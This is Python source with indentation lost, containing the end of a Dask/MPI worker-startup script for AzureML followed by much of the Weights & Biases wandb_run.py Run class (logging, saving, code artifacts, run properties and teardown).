logger.info("Worker started")
def _start_and_monitor_worker(worker):
logger.info("Starting worker...")
loop = IOLoop.current()
@gen.coroutine
def run():
yield worker._start()
while worker.status != 'closed':
yield gen.sleep(0.2)
try:
logger.info("Worker started")
loop.run_sync(run)
finally:
logger.info("Closing worker")
@gen.coroutine
def close():
yield worker._close(timeout=2)
loop.run_sync(close)
logger.info("Exiting worker")
def _get_num_nodes():
return int(os.getenv("AZUREML_NODE_COUNT", 1))
def start(processing_func, cores_per_worker=None, memory_limit="auto"):
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nprocs = comm.Get_size()
logger.info("Rank {} of {}".format(rank, nprocs))
ncpus = os.cpu_count()
nnodes = _get_num_nodes()
logger.info(
"Detected {} processes with {} nodes and {} cpus per node".format(
nprocs, nnodes, ncpus
)
)
cores_per_worker = (
cores_per_worker if cores_per_worker else math.floor(ncpus * nnodes / nprocs)
)
logger.info("Setting {} cores per worker".format(cores_per_worker))
scheduler_str = os.getenv("AZ_BATCH_MASTER_NODE", "10.0.0.4:6000")
if scheduler_str is None:
raise ValueError(
"AZ_BATCH_MASTER_NODE environment variable not found. "
"Can not start Dask Scheduler without master node"
)
if rank == 0: # Master
loop = IOLoop.current()
t = Thread(target=loop.start, daemon=True)
t.start()
scheduler = _start_scheduler()
worker = _create_worker(scheduler_str, cores_per_worker, memory_limit=memory_limit)
_start_worker(worker)
processing_func(scheduler_str)
t.join(timeout=10)
worker_dict = scheduler.retire_workers(close_workers=True)
logger.debug(worker_dict.result())
scheduler.stop()
logger.info("Exiting client and scheduler")
else:
worker = _create_worker(scheduler_str, cores_per_worker, memory_limit=memory_limit)
_start_and_monitor_worker(worker)
|
wandb_run.py
|
# File is generated by: tox -e codemod
# -*- coding: utf-8 -*-
from __future__ import print_function
import atexit
from datetime import timedelta
import glob
import json
import logging
import numbers
import os
import platform
import re
import sys
import threading
import time
import traceback
import click
import requests
from six import iteritems, string_types
from six.moves import _thread as thread
from six.moves.collections_abc import Mapping
from six.moves.urllib.parse import quote as url_quote
from six.moves.urllib.parse import urlencode
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.errors import Error
from wandb.util import add_import_hook, sentry_set_scope, to_forward_slash_path
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_history
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .lib import (
apikey,
config_util,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
sparkline,
telemetry,
)
if wandb.TYPE_CHECKING: # type: ignore
from typing import (
Any,
Dict,
List,
Optional,
Sequence,
TextIO,
Tuple,
Union,
Type,
Callable,
)
from types import TracebackType
from .wandb_settings import Settings, SettingsConsole
from .interface.summary_record import SummaryRecord
from .interface.interface import BackendSender
from .lib.reporting import Reporter
from wandb.proto.wandb_internal_pb2 import (
RunRecord,
FilePusherStats,
PollExitResponse,
MetricRecord,
)
from .wandb_setup import _WandbSetup
from wandb.apis.public import Api as PublicApi
from .wandb_artifacts import Artifact
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import NoReturn
from .data_types import WBValue
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RUN_NAME_COLOR = "#cdcd00"
RE_LABEL = re.compile(r"[a-zA-Z0-9_-]+$")
class ExitHooks(object):
exception = None
def __init__(self):
self.exit_code = 0
self.exception = None
def hook(self):
self._orig_exit = sys.exit
sys.exit = self.exit
self._orig_excepthook = (
sys.excepthook
if sys.excepthook
!= sys.__excepthook__ # respect hooks by other libraries like pdb
else None
)
sys.excepthook = self.exc_handler
def exit(self, code = 0):
orig_code = code
if code is None:
code = 0
elif not isinstance(code, int):
code = 1
self.exit_code = code
self._orig_exit(orig_code)
def was_ctrl_c(self):
return isinstance(self.exception, KeyboardInterrupt)
def exc_handler(
self, exc_type, exc, tb
):
self.exit_code = 1
self.exception = exc
if issubclass(exc_type, Error):
wandb.termerror(str(exc))
if self.was_ctrl_c():
self.exit_code = 255
traceback.print_exception(exc_type, exc, tb)
if self._orig_excepthook:
self._orig_excepthook(exc_type, exc, tb)
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface,
stop_polling_interval = 15,
retry_polling_interval = 5,
):
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self):
self._join_event.set()
def join(self):
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run(object):
"""
A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`.
In distributed training, use `wandb.init()` to create a run for
each process, and set the group argument to organize runs into a larger experiment.
Currently there is a parallel Run object in the wandb.Api. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
# _telemetry_obj: telemetry.TelemetryRecord
# _teardown_hooks: List[Callable[[], None]]
# _tags: Optional[Tuple[Any, ...]]
# _entity: Optional[str]
# _project: Optional[str]
# _group: Optional[str]
# _job_type: Optional[str]
# _name: Optional[str]
# _notes: Optional[str]
# _run_obj: Optional[RunRecord]
# _run_obj_offline: Optional[RunRecord]
# Use string literal anotation because of type reference loop
# _backend: Optional["wandb.sdk.backend.backend.Backend"]
# _wl: Optional[_WandbSetup]
# _upgraded_version_message: Optional[str]
# _deleted_version_message: Optional[str]
# _yanked_version_message: Optional[str]
# _out_redir: Optional[redirect.RedirectBase]
# _err_redir: Optional[redirect.RedirectBase]
# _redirect_cb: Optional[Callable[[str, str], None]]
# _output_writer: Optional["filesystem.CRDedupedFile"]
# _atexit_cleanup_called: bool
# _hooks: Optional[ExitHooks]
# _exit_code: Optional[int]
# _run_status_checker: Optional[RunStatusChecker]
# _poll_exit_response: Optional[PollExitResponse]
# _sampled_history: Optional[Dict[str, Union[List[int], List[float]]]]
# _use_redirect: bool
# _stdout_slave_fd: Optional[int]
# _stderr_slave_fd: Optional[int]
# _pid: int
def __init__(
self,
settings,
config = None,
sweep_config = None,
):
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_settings(settings)
self._backend = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history = wandb_history.History(self)
self.history._set_callback(self._history_callback)
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._wl = None
self._reporter = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._final_summary = None
self._sampled_history = None
self._jupyter_progress = None
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
self._jupyter_progress = ipython.jupyter_progress_bar()
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
"user",
entity=self._entity,
project=self._project,
email=self._settings.email,
)
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
self._atexit_cleanup_called = False
self._use_redirect = True
self._progress_step = 0
self._pid = os.getpid()
def _telemetry_callback(self, telem_obj):
self._telemetry_obj.MergeFrom(telem_obj)
def _freeze(self):
self._frozen = True
def __setattr__(self, attr, value):
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp):
mods = sys.modules
if mods.get("torch"):
imp.torch = True
if mods.get("keras"):
imp.keras = True
if mods.get("tensorflow"):
imp.tensorflow = True
if mods.get("sklearn"):
imp.sklearn = True
if mods.get("fastai"):
imp.fastai = True
if mods.get("xgboost"):
imp.xgboost = True
if mods.get("catboost"):
imp.catboost = True
if mods.get("lightgbm"):
imp.lightgbm = True
if mods.get("pytorch_lightning"):
imp.pytorch_lightning = True
if mods.get("ignite"):
imp.pytorch_ignite = True
if mods.get("transformers"):
imp.transformers_huggingface = True
def _init_from_settings(self, settings):
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run):
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
# Note: run.config is set in interface/interface:_make_run()
def __getstate__(self):
pass
def __setstate__(self, state):
pass
@property
def dir(self):
"""
Returns:
(str): The directory where all of the files associated with the run are
placed.
"""
return self._settings.files_dir
@property
def config(self):
"""
Returns:
(Config): A config object (similar to a nested dict) of key
value pairs associated with the hyperparameters of the run.
"""
return self._config
@property
def config_static(self):
return wandb_config.ConfigStatic(self._config)
@property
def name(self):
"""
Returns:
(str): the display name of the run. It does not need to be unique
and ideally is descriptive.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name):
self._name = name
if self._backend:
self._backend.interface.publish_run(self)
@property
def notes(self):
r"""
Returns:
(str): notes associated with the run. Notes can be a multiline string
and can also use markdown and latex equations inside $$ like $\\{x}"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes):
self._notes = notes
if self._backend:
self._backend.interface.publish_run(self)
@property
def tags(self):
"""
Returns:
(Tuple[str]): tags associated with the run
"""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags):
self._tags = tuple(tags)
if self._backend:
self._backend.interface.publish_run(self)
@property
def id(self):
"""id property.
Returns:
(str): the run_id associated with the run
"""
if wandb.TYPE_CHECKING and TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self):
"""
Returns:
(str, optional): the sweep id associated with the run or None
"""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self):
"""
Returns:
(str): the path to the run `[entity]/[project]/[run_id]`
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self):
"""
Returns:
(int): the unix time stamp in seconds when the run started
"""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self):
"""
Returns:
(int): the first step of the run
"""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self):
"""
Returns:
(bool): whether or not the run was resumed
"""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self):
"""
Every time you call wandb.log() it will by default increment the step
counter.
Returns:
(int): step counter
"""
return self.history._step
def project_name(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self):
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
return "dryrun" if self._settings._offline else "run"
@property
def offline(self):
return self._settings._offline
@property
def disabled(self):
return self._settings._noop
@property
def group(self):
"""
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing a distributed training you should give all of the
runs in the training the same group.
If you are doing crossvalidation you should give all the crossvalidation
folds the same group.
Returns:
(str): name of W&B group associated with run.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self):
"""
Returns:
(str): name of W&B project associated with run.
"""
return self.project_name()
def log_code(
self,
root = ".",
name = None,
include_fn = lambda path: path.endswith(".py"),
exclude_fn = filenames.exclude_wandb_fn,
):
"""
log_code() saves the current state of your code to a W&B artifact. By
default it walks the current directory and logs all files that end with ".py".
Arguments:
root (str, optional): The relative (to os.getcwd()) or absolute path to
recursively find code from.
name (str, optional): The name of our code artifact. By default we'll name
the artifact "source-$RUN_ID". There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn (callable, optional): A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn (callable, optional): A callable that accepts a file path and
returns True when it should be excluded and False otherwise. This
defaults to: `lambda path: False`
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such is ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self):
"""
Returns:
A url (str, optional) for the W&B run or None if the run
is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_run_url()
def get_project_url(self):
"""
Returns:
A url (str, optional) for the W&B project associated with
the run or None if the run is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_project_url()
def get_sweep_url(self):
"""
Returns:
A url (str, optional) for the sweep associated with the run
or None if there is no associated sweep or the run is offline.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_sweep_url()
@property
def url(self):
"""
Returns:
(str): name of W&B url associated with run.
"""
return self.get_url()
@property
def entity(self):
"""
Returns:
(str): name of W&B entity associated with run. Entity is either
a user name or an organization name.
"""
return self._entity or ""
def _label_internal(
self, code = None, repo = None, code_version = None
):
with telemetry.context(run=self) as tel:
if code and RE_LABEL.match(code):
tel.label.code_string = code
if repo and RE_LABEL.match(repo):
tel.label.repo_string = repo
if code_version and RE_LABEL.match(code_version):
tel.label.code_version = code_version
def _label(
self,
code = None,
repo = None,
code_version = None,
**kwargs
):
if self._settings.label_disable:
return
for k, v in (("code", code), ("repo", repo), ("code_version", code_version)):
if v and not RE_LABEL.match(v):
wandb.termwarn(
"Label added for '{}' with invalid identifier '{}' (ignored).".format(
k, v
),
repeat=False,
)
for v in kwargs:
wandb.termwarn(
"Label added for unsupported key '{}' (ignored).".format(v),
repeat=False,
)
self._label_internal(code=code, repo=repo, code_version=code_version)
# update telemetry in the backend immediately for _label() callers
if self._backend:
self._backend.interface.publish_telemetry(self._telemetry_obj)
def _label_probe_lines(self, lines):
if not lines:
return
parsed = telemetry._parse_label_lines(lines)
if not parsed:
return
label_dict = {}
code = parsed.get("code") or parsed.get("c")
if code:
label_dict["code"] = code
repo = parsed.get("repo") or parsed.get("r")
if repo:
label_dict["repo"] = repo
code_ver = parsed.get("version") or parsed.get("v")
if code_ver:
label_dict["code_version"] = code_ver
self._label_internal(**label_dict)
def _label_probe_main(self):
m = sys.modules.get("__main__")
if not m:
return
doc = getattr(m, "__doc__", None)
if not doc:
return
doclines = doc.splitlines()
self._label_probe_lines(doclines)
# TODO: annotate jupyter Notebook class
def _label_probe_notebook(self, notebook):
logger.info("probe notebook")
lines = None
try:
data = notebook.probe_ipynb()
cell0 = data.get("cells", [])[0]
lines = cell0.get("source")
except Exception as e:
logger.info("Unable to probe notebook: {}".format(e))
return
if lines:
self._label_probe_lines(lines)
def _repr_mimebundle_(
self, include = None, exclude = None
):
url = self._get_run_url()
style = "border:none;width:100%;height:400px"
s = '<h1>Run({})</h1><iframe src="{}" style="{}"></iframe>'.format(
self._run_id, url, style
)
return {"text/html": s}
def _config_callback(
self,
key = None,
val = None,
data = None,
):
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _set_config_wandb(self, key, val):
self._config_callback(key=("_wandb", key), val=val)
def _summary_update_callback(self, summary_record):
if self._backend:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self):
if not self._backend:
return {}
ret = self._backend.interface.communicate_summary()
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record):
if self._backend:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname):
if not self._backend:
return
files = dict(files=[(fname, "now")])
self._backend.interface.publish_files(files)
# TODO(jhr): codemod add: PEP 3102 -- Keyword-Only Arguments
def _history_callback(self, row, step):
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
if self._backend:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_history(
row, step, publish_step=not_using_tensorboard
)
def _console_callback(self, name, data):
# logger.info("console callback: %s, %s", name, data)
if self._backend:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir, save = None, root_logdir = None
):
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library):
self._wl = library
def _set_backend(self, backend):
self._backend = backend
def _set_reporter(self, reporter):
self._reporter = reporter
def _set_teardown_hooks(self, hooks):
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj):
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history._update_step()
# TODO: It feels weird to call this twice..
sentry_set_scope(
"user",
entity=run_obj.entity,
project=run_obj.project,
email=self._settings.email,
url=self._get_run_url(),
)
def _set_run_obj_offline(self, run_obj):
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type, key, value
):
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated uneccessary data
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server"""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if data_type in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def log(
self,
data,
step = None,
commit = None,
sync = None,
):
"""Log a dict to the global run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, and matplotlib plots.
The most basic usage is `wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`.
This will save a history row associated with the run with `train-loss=0.5`
and `accuracy=0.9`. Visualize logged data in the workspace at wandb.ai,
or locally on a self-hosted instance of the W&B app:
https://docs.wandb.ai/self-hosted
Export data to explore in a Jupyter notebook, for example, with the API:
https://docs.wandb.ai/ref/public-api
Each time you call wandb.log(), this adds a new row to history and updates
the summary values for each key logged. In the UI, summary values show
up in the run table to compare single values across runs. You might want
to update summary manually to set the *best* value instead of the *last*
value for a given metric. After you finish logging, you can set summary:
`wandb.run.summary["accuracy"] = 0.9`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the wandb UI. See
https://docs.wandb.com/library/reference/data_types for all of the different
supported types.
Logging nested metrics is encouraged and is supported in the wandb API, so
you could log multiple accuracy values with `wandb.log({'dataset-1':
{'acc': 0.9, 'loss': 0.3} ,'dataset-2': {'acc': 0.8, 'loss': 0.2}})`
and the metrics will be organized in the wandb UI.
W&B keeps track of a global step so logging related metrics together is
encouraged, so by default each time wandb.log is called a global step
is incremented. If it's inconvenient to log related metrics together
calling `wandb.log({'train-loss': 0.5, commit=False})` and then
`wandb.log({'accuracy': 0.9})` is equivalent to calling
`wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`
wandb.log is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
row: (dict, optional) A dict of serializable python objects i.e `str`,
`ints`, `floats`, `Tensors`, `dicts`, or `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
and increment the step. If false `wandb.log` just updates the current
metrics dict with the row argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, True) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
Basic usage
```python
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
Incremental logging
```python
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
Histogram
```python
wandb.log({"gradients": wandb.Histogram(numpy_array_or_sequence)})
```
Image
```python
wandb.log({"examples": [wandb.Image(numpy_array_or_pil, caption="Label")]})
```
Video
```python
wandb.log({"video": wandb.Video(numpy_array_or_video_path, fps=4,
format="gif")})
```
Matplotlib Plot
```python
wandb.log({"chart": plt})
```
PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
For more examples, see https://docs.wandb.com/library/log
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
current_pid = os.getpid()
if current_pid != self._pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._pid
)
if self._settings._strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, string_types) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history._step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history._step, data
)
)
)
return
elif step > self.history._step:
self.history._flush()
self.history._step = step
elif commit is None:
commit = True
if commit:
self.history._row_add(data)
else:
self.history._row_update(data)
def save(
self,
glob_str = None,
base_path = None,
policy = "live",
):
""" Ensure all files matching `glob_str` are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) on of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
wandb.termwarn(
(
"Calling run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
)
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name,
run_path = None,
replace = False,
root = None,
):
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code = None):
"""Marks a run as finished, and finishes uploading all data. This is
used when creating multiple runs in the same process. We automatically
call this method when your script exits.
"""
with telemetry.context(run=self) as tel:
tel.feature.finish = True
# detach logger, other setup cleanup
logger.info("finishing run %s", self.path)
for hook in self._teardown_hooks:
hook()
self._teardown_hooks = []
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
module.unset_globals()
def join(self, exit_code = None):
"""Deprecated alias for `finish()` - please use finish"""
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
table_key: the key used to log the data table
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _set_upgraded_version_message(self, msg):
self._upgraded_version_message = msg
def _set_deleted_version_message(self, msg):
self._deleted_version_message = msg
def _set_yanked_version_message(self, msg):
self._yanked_version_message = msg
def _add_panel(
self, visualize_key, panel_type, panel_config
):
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
